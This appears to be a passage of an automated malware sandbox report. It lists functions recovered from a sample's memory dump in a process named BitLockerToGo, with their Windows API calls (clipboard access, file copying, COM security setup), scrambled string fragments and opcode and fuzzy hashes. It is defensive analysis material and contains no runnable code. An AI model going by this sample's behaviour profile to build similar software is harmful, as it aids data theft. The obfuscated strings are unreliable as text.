                                                                                                                                                                                                                                • API ID: FreeHeap
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 3298025750-0
                                                                                                                                                                                                                                • Opcode ID: ad8cd01fdbb763b22e3272ffa6ff14137fc81bc64726dfef08a9e934642691d3
                                                                                                                                                                                                                                • Instruction ID: 9bb487dcf71c1022035d2fe9e82783c858f6716856c3875796728850b327721c
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ad8cd01fdbb763b22e3272ffa6ff14137fc81bc64726dfef08a9e934642691d3
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4731693920C240DBD305DF28D891A6ABBF4EB8A700F14582CE5C9C33A1C339D810CB9A

                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                control_flow_graph 379 43be52-43be5c RtlAllocateHeap
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • RtlAllocateHeap.NTDLL(?,00000000), ref: 0043BE56
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000013.00000002.1980419555.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_19_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: AllocateHeap
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 1279760036-0
                                                                                                                                                                                                                                • Opcode ID: 03fa4a21b61d59e190f480ff32a21aa0abf3e200167923fb04d6b82dbe505dbf
                                                                                                                                                                                                                                • Instruction ID: 2ad7c527032a263243312f901bca40d909d0cb4c9b587d058bc60391f750cdbf
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 03fa4a21b61d59e190f480ff32a21aa0abf3e200167923fb04d6b82dbe505dbf
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 41A0029658421026F55831283C47FF6111C8780A20F554889B914591C5D45D59A210A9
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000013.00000002.1980419555.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_19_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID: #"]$(+*%$,/.)$4761$4`[b$4`[b$8;:5$<?>9$LMNO$LONI$PQRS$PSRM$TWVQ$V$X[ZU$\_^Y$dgfa$hkje$l$xy$x{zu${z}|$'
                                                                                                                                                                                                                                • API String ID: 0-375777689
                                                                                                                                                                                                                                • Opcode ID: 62f46b3979deaf4fc9881624ef79e8d59038f29eefb7456fb0b7095e0b956d75
                                                                                                                                                                                                                                • Instruction ID: 9f79eb90806f77a4a2d7ba2a657207958e907496242960f27079a9900020f3a6
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 62f46b3979deaf4fc9881624ef79e8d59038f29eefb7456fb0b7095e0b956d75
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 18139BB46083818BD730CF18C895BABBBF1EFC6344F14492DE5998B351D7399895CB86
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000013.00000002.1980419555.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_19_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID: ?61$Bk=9$f@~%$giD$ido1$ip0w$yzyq${z}|$Wu$aD$ga$tT
                                                                                                                                                                                                                                • API String ID: 0-1997683003
                                                                                                                                                                                                                                • Opcode ID: e944786b9ea00541cf4c5e6bc73bd67333054784970251e496f49b58e5379973
                                                                                                                                                                                                                                • Instruction ID: 207c280fb0abf30fec7d474511c4a372c462ec9e89af6cfb67b8e0970a38ec39
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e944786b9ea00541cf4c5e6bc73bd67333054784970251e496f49b58e5379973
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8343EE70604B918BD329CF35D4A07A7BBE2AF56305F58896EC8EB4B782C738B405CB55
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000013.00000002.1980419555.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_19_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID: 17$3o#i$9E#G$=c;m$=c;m$I9I?$K?Q9$M=C3$T%N;$Y-e#$_)e/$z!|'$79$;=$qs$s}$y{${e
                                                                                                                                                                                                                                • API String ID: 0-4125528656
                                                                                                                                                                                                                                • Opcode ID: ee5f6ea6a552c1dd9e382d7076199f531666ec6d38e2ac1d5e9a8c3e3d8bdc70
                                                                                                                                                                                                                                • Instruction ID: 34187e7ed410ca5c152189e597509f2a642e1a1e2118662cbe80661fe384a421
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ee5f6ea6a552c1dd9e382d7076199f531666ec6d38e2ac1d5e9a8c3e3d8bdc70
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 14420DB4901B65CFD720CF26D98079ABBF1FB06704F50895DD4AAABB51CB70A846CF84
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000013.00000002.1980419555.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_19_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Clipboard$Global$CloseDataLockLongOpenUnlockWindow
                                                                                                                                                                                                                                • String ID: 4$;$>$?$O$S
                                                                                                                                                                                                                                • API String ID: 2832541153-1960230271
                                                                                                                                                                                                                                • Opcode ID: e05244b153dc9a1fdeba6e10faecd2e3da2c231aaafba825bc27a2778ea6d949
                                                                                                                                                                                                                                • Instruction ID: f22d1ee4f66799298c411162af6e252708cf3ad489b2e0e9cd3b108e9c3c63f9
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e05244b153dc9a1fdeba6e10faecd2e3da2c231aaafba825bc27a2778ea6d949
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 75413E7150C3808EE301EF78D08832FBFE09B96319F05896EE4C997282D7798649CB97
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • CopyFileW.KERNEL32(00000000,F934FBC1,00000000), ref: 00427C0C
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000013.00000002.1980419555.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_19_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: CopyFile
                                                                                                                                                                                                                                • String ID: ~B$- (%$2~B$4`[b$D|B$Y`Pb$mF${z}|$7Wu
                                                                                                                                                                                                                                • API String ID: 1304948518-2812417273
                                                                                                                                                                                                                                • Opcode ID: 65ce4430d931aa4502657a45226352af6ee4153183fd664d6bafbc0500aba405
                                                                                                                                                                                                                                • Instruction ID: fe9824869f0dae0d5946f997d6a37a22f375a81f15da38fc43ed073316cd0bff
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 65ce4430d931aa4502657a45226352af6ee4153183fd664d6bafbc0500aba405
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: BB919CB8E00229DFEB24CF54DC94BAEBBB1FF46310F1444A9E409A7251C7745A85CFA6
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000013.00000002.1980419555.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_19_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Uninitialize
                                                                                                                                                                                                                                • String ID: &$4`[b$[`ST$^!M?$giD$il^l$kbe[$lebS${z}|$aD
                                                                                                                                                                                                                                • API String ID: 3861434553-615325228
                                                                                                                                                                                                                                • Opcode ID: cc8ac887c55440a9ed15d3b807cb1b54f19d076eb0bbc7787b749c07f30dcfc5
                                                                                                                                                                                                                                • Instruction ID: 9f1a9298f70eff6cfa9869f1271bb1d28657c8a3becb9b946c79affb36b1d128
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: cc8ac887c55440a9ed15d3b807cb1b54f19d076eb0bbc7787b749c07f30dcfc5
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: CB72BBB4600B408FD724CF25C991767BBF2BF5A308F14896DD49A4BB92D739E805CB98
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000013.00000002.1980419555.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_19_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: String$Free$InitVariant
                                                                                                                                                                                                                                • String ID: 4`[b${z}|
                                                                                                                                                                                                                                • API String ID: 3266816356-870993828
                                                                                                                                                                                                                                • Opcode ID: ca838c767c210b11875eff038e1a17a6ff8844d1249fdfe84a7a7bc40f4f02de
                                                                                                                                                                                                                                • Instruction ID: 9e2e47e19a541799ac09d9a4dc7d125d0e3ab92c05da88b54fffd56ec258cf85
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ca838c767c210b11875eff038e1a17a6ff8844d1249fdfe84a7a7bc40f4f02de
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3A12EF75A08311CFDB14CF68D891BAFB7B1FB89304F14482DE586A7291CB39D905CB9A
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 00411207
                                                                                                                                                                                                                                • CoUninitialize.OLE32 ref: 00411373
                                                                                                                                                                                                                                • CoUninitialize.OLE32 ref: 00411380
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000013.00000002.1980419555.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_19_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Uninitialize$InitializeSecurity
                                                                                                                                                                                                                                • String ID: giD$aD
                                                                                                                                                                                                                                • API String ID: 3783375937-311618039
                                                                                                                                                                                                                                • Opcode ID: b472706b3c5e752ff511ba91d728fcc052cfa3b3cf2bf7da2d67551223d1b89b
                                                                                                                                                                                                                                • Instruction ID: 03b93a004704de0b4fe086fb3b88ddccbfb3101ec3b7b8ae39887bb3df1008f0
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b472706b3c5e752ff511ba91d728fcc052cfa3b3cf2bf7da2d67551223d1b89b
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: FBC199B4204B419FD324CF25C990662BBF1FF5A704B148A5ED5AB8BB91C734F805CB95
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000013.00000002.1980419555.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_19_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID: $#$HIVw$HIVw$Hik$YaBc$j]n_$lo$qArC
                                                                                                                                                                                                                                • API String ID: 0-1002876972
                                                                                                                                                                                                                                • Opcode ID: d38956c0988cf30a0b65609206829045acf62ce7eec826903e1306f6bb9ddff3
                                                                                                                                                                                                                                • Instruction ID: 82e2a1c42121637b19749606a30b915a797e26da2ab37e605b3b69acdbabb018
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d38956c0988cf30a0b65609206829045acf62ce7eec826903e1306f6bb9ddff3
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 492278B420C3819FD324DF15D8A0B6BBBF2EF86740F54892CE5CA4B260D7749885CB5A
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000013.00000002.1980419555.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_19_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID: 1=4?$H$IX$LV$MV$PQ$|$aD
                                                                                                                                                                                                                                • API String ID: 0-147938389
                                                                                                                                                                                                                                • Opcode ID: 0f8e8c07eef842ed87844cf01cd6bcd0fccc2df7807350d812c42fd03483afa1
                                                                                                                                                                                                                                • Instruction ID: 69afd71aef41d8c42e54c340c4608c87938b0e66dc758dc756f4924cacd82a19
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0f8e8c07eef842ed87844cf01cd6bcd0fccc2df7807350d812c42fd03483afa1
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 67F155B46083409BE318DF29C490A2FBBE2EF95704F148D2DE1C98B391D739D959CB96
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000013.00000002.1980419555.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_19_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID: $0$0$0$@$i
                                                                                                                                                                                                                                • API String ID: 0-4153665256
                                                                                                                                                                                                                                • Opcode ID: 8d3acc5640dcbada77d3cc1cabe3ba2665fc440abce30299abe6af00f4575244
                                                                                                                                                                                                                                • Instruction ID: 64f7f18c1ad76126767cf3378d22a290c4f785b2b693afe25fbfba7627e1e063
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8d3acc5640dcbada77d3cc1cabe3ba2665fc440abce30299abe6af00f4575244
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4C72C171A083429FD319CF28C68471BBBE1ABC5314F148A2EE899A73D1D778DD45CB86
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000013.00000002.1980419555.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_19_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID: $'&$$'&$$'&$$'&$OHBr$VC-;
                                                                                                                                                                                                                                • API String ID: 0-254379128
                                                                                                                                                                                                                                • Opcode ID: c4acfdf513fa1e39ec19355db2f8dc03408ee70e748df2281d6592469bce1360
                                                                                                                                                                                                                                • Instruction ID: 104ab0bbee3024ae427e0a8cde71e397195c46269bf6ad0b24026f9b08d2c55c
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c4acfdf513fa1e39ec19355db2f8dc03408ee70e748df2281d6592469bce1360
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 749123B560C3818BD325DF29C580A1FFBE2AF99344F149E6DE4D883316C339E8558B96
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000013.00000002.1980419555.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_19_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID: w?B$S2Q
                                                                                                                                                                                                                                • API String ID: 0-1403397284
                                                                                                                                                                                                                                • Opcode ID: 5bd244bdb3a821b374ce20d1ef4a16e2cea21b90dfed9d4b6471ae6c2e294cc4
                                                                                                                                                                                                                                • Instruction ID: 1300d452a248927efdf5e21ffca84c2364bc814bf13454e942b8c63df9c28121
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5bd244bdb3a821b374ce20d1ef4a16e2cea21b90dfed9d4b6471ae6c2e294cc4
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7802FFB4A0062ACFDB14CF95D8916AFBBB1FF4A300F14455DE852AB790D378A941CF98
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000013.00000002.1980419555.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_19_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: MetricsSystem
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 4116985748-3916222277
                                                                                                                                                                                                                                • Opcode ID: 978c6f465ecc8cbd06da3adc0dc7768fe5ff61269f0cda11b843315c286c5e68
                                                                                                                                                                                                                                • Instruction ID: 162965490ac7c7717a845054147a93cd475d262d132619b2d59047de1bcd3bf3
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 978c6f465ecc8cbd06da3adc0dc7768fe5ff61269f0cda11b843315c286c5e68
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 80517FB4E142588FDB40EFACD98569EBBF0BB49310F118529E898E7350D734A944CF96
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000013.00000002.1980419555.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_19_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID: <?>9$f${z}|
                                                                                                                                                                                                                                • API String ID: 0-1528457775
                                                                                                                                                                                                                                • Opcode ID: 2f1c30625d396274c772214ff76b5f417a66d0c8a8ebee43acb5fe66147aac71
                                                                                                                                                                                                                                • Instruction ID: 2629489222c788841babdff9becc5f5b6c44cef1992e0f9f89312b2c045bd4e7
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2f1c30625d396274c772214ff76b5f417a66d0c8a8ebee43acb5fe66147aac71
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8B32A075A083018FC718CF19D890B2BBBE1ABC9718F189A6EE4D597391D739DC05CB46
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000013.00000002.1980419555.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_19_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID: 4`[b${z}|$|]-_
                                                                                                                                                                                                                                • API String ID: 0-2061405167
                                                                                                                                                                                                                                • Opcode ID: 1625af268bf879e33a325fa4fab8ac8def49d416c646c051d6cf2abb39791c95
                                                                                                                                                                                                                                • Instruction ID: acc32063bc0333f861e7221d2dee0d19898b4204572fc44d68c729dab4f49b93
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1625af268bf879e33a325fa4fab8ac8def49d416c646c051d6cf2abb39791c95
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: DD1234B5E0022ACFDB14CF94D8916AFB7B2FF46304F184559E851AB391E738AD11CB98
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000013.00000002.1980419555.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_19_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID: 4`[b${z}|$|]-_
                                                                                                                                                                                                                                • API String ID: 0-2061405167
                                                                                                                                                                                                                                • Opcode ID: c757b625e060e518fef047f820de423a1e30584ca66b2600cd3e0cd4f3da2de5
                                                                                                                                                                                                                                • Instruction ID: 632fc9fbefe75662590490a92cb1c13ffcca55d06c42df41b895b0bb90b5d325
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c757b625e060e518fef047f820de423a1e30584ca66b2600cd3e0cd4f3da2de5
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2A1223B5E0022ACFDB14CF98D8916AFB7B2FF46314F184559D851AB391E738AD01CB98
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000013.00000002.1980419555.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_19_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID: 4`[b$<="#$PW
                                                                                                                                                                                                                                • API String ID: 0-4084195500
                                                                                                                                                                                                                                • Opcode ID: 5ea502fa2b14dffa8b715c220a802ec4e668bf8045331ca91475dd30b40e515f
                                                                                                                                                                                                                                • Instruction ID: e5649b9c3ae17e7836f9aa7eead9792173d014cafbcda4b4fc1a6df08007ec3d
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5ea502fa2b14dffa8b715c220a802ec4e668bf8045331ca91475dd30b40e515f
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F3D13275608220ABD314EF28D991A2BB7E1EF95310F48892DE8C597351E77CED01CB9B
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000013.00000002.1980419555.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_19_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                                                                • String ID: 4`[b$4`[b${z}|
                                                                                                                                                                                                                                • API String ID: 2994545307-3140895085
                                                                                                                                                                                                                                • Opcode ID: 3ec363bc381b74cb38954220f28058e52e5a9ec6f5f54fe363a84071aa1ea9b1
                                                                                                                                                                                                                                • Instruction ID: 15fb3e4e0f9ef0bef224c87157050fd888359bbf67911a7a5790447d5b5983b6
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3ec363bc381b74cb38954220f28058e52e5a9ec6f5f54fe363a84071aa1ea9b1
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E721F174E0061ACFDF14CB98E9909BFB3B2FB05309FA4446AD401A7291D335AD01CB29
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000013.00000002.1980419555.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_19_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID: EG$IK
                                                                                                                                                                                                                                • API String ID: 0-1774823931
                                                                                                                                                                                                                                • Opcode ID: 8b1c263b04b2b71d863c55e535e6219e7b68f77cb6a4f5665da51c93d0db7a14
                                                                                                                                                                                                                                • Instruction ID: a28e671efbaf491ec41cf6d8b29627eb30dde7b1ce7a7fd133ecb0115aec9257
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8b1c263b04b2b71d863c55e535e6219e7b68f77cb6a4f5665da51c93d0db7a14
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 49B1F5B45083108BC714DF18C8A1B6BB7F1FFA6354F148A0DE4C64B3A1E7799985CB9A
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000013.00000002.1980419555.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_19_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID: <?>9${z}|
                                                                                                                                                                                                                                • API String ID: 0-3153303456
                                                                                                                                                                                                                                • Opcode ID: e25b48be60df2b7bbf70b03a2a2d6ac87cb255953da2d748f099148fa30c0813
                                                                                                                                                                                                                                • Instruction ID: d16d531e3015419f2427ee1f2613d79eba9e031b69592dfd2a62ebe801056037
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e25b48be60df2b7bbf70b03a2a2d6ac87cb255953da2d748f099148fa30c0813
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2481E035A083418BD718DF19D85072BF7E2ABC9314F29992EE4CA97391C735EC11CB4A
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000013.00000002.1980419555.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_19_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID: {z}|${z}|
                                                                                                                                                                                                                                • API String ID: 0-1242284508
                                                                                                                                                                                                                                • Opcode ID: 8c3c370cc709ea47a6943ec99db0a14991b9bae05461853a7a71fc9eff0e8fec
                                                                                                                                                                                                                                • Instruction ID: 17c4f94de9d824f3ab77fb6d4dd4c3aa2d29a6c4cf8d4631d3b0756dca5ec10a
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8c3c370cc709ea47a6943ec99db0a14991b9bae05461853a7a71fc9eff0e8fec
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: CA71F1366083109BC710DF29C88066BF7E5EBD9754F19A92EE8D5E7351C739EC018B86
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000013.00000002.1980419555.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_19_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID: I?J1${z}|
                                                                                                                                                                                                                                • API String ID: 0-4122175343
                                                                                                                                                                                                                                • Opcode ID: becbd51de82991c1da9e99c0db0a4c37bf2af733f42fd835cb268624b7e709c6
                                                                                                                                                                                                                                • Instruction ID: 9a5e5cd4a20dee038e9278feb9dab9c1f8b7ee4c9ab15c5125dd70ecdedc5dee
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: becbd51de82991c1da9e99c0db0a4c37bf2af733f42fd835cb268624b7e709c6
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: AA51E57AA082108FD714DF19C8C0A1BB3A2FBC9714F29D52DD584A7356D735EC018B9A
